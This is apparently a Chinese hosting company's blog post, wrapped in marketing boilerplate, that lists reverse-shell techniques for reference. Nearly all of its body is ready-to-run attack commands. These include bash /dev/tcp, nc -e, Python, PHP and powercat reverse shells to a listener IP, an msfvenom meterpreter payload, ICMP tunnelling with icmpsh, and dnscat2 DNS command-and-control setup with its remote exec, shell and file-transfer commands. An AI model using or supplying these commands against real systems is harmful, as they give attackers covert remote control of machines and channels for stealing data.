重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
让客户满意是我们工作的目标,不断超越客户的期望值来自于我们对这个行业的热爱。我们立志把好的技术通过有效、简单的方式提供给客户,将通过不懈努力成为客户在信息化领域值得信任、有价值的长期合作伙伴,公司提供的服务项目有:域名注册、网络空间、营销软件、网站建设、含山网站维护、网站推广。
bash -i >& /dev/tcp/ip_address/port 0>&1
nc -e /bin/sh 192.168.2.130 4444
import socket,subprocess,os s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( "192.168.2.130" , 4444 )) os.dup2(s.fileno(), 0 ) os.dup2(s.fileno(), 1 ) os.dup2(s.fileno(), 2 ) p = subprocess.call([ "/bin/bash" , "-i" ])
Import-Module .\powercat.ps1 powercat -c 192.168.2.130 -p 4444 -e cmd.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
关闭icmp响应,不然shell一直跳,恢复是0 sysctl -w net.ipv4.icmp_echo_ignore_all=1 python icmpsh_m.py 源 目标 python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137
https://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
git clone https://github.com/iagox86/dnscat2.git cd dnscat2 cd server sudo gem install bundler bundle install sudo ruby ./dnscat2.rb
ruby dnscat2.rb --dns host=0.0.0.0,port=53531 ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥) ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531 ./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥) ./dnscat xxx.com
quit (退出控制台) kill(中断通道) set(设值,比如设置security=open) windows(列举出所有的通道) window -i (连接某个通道) 连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令): clear(清屏) delay(修改远程会话超时时间) exec(执行远程机上的程序) shell(得到一个反弹shell) download/upload(两端之间上传下载文件) supend(返回到上一层,等于快捷键ctrl+z)
listen 127.0.0.1:6666 192.168.2.135:80 本机的6666就可以访问80端口
关于“反弹shell有哪些”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。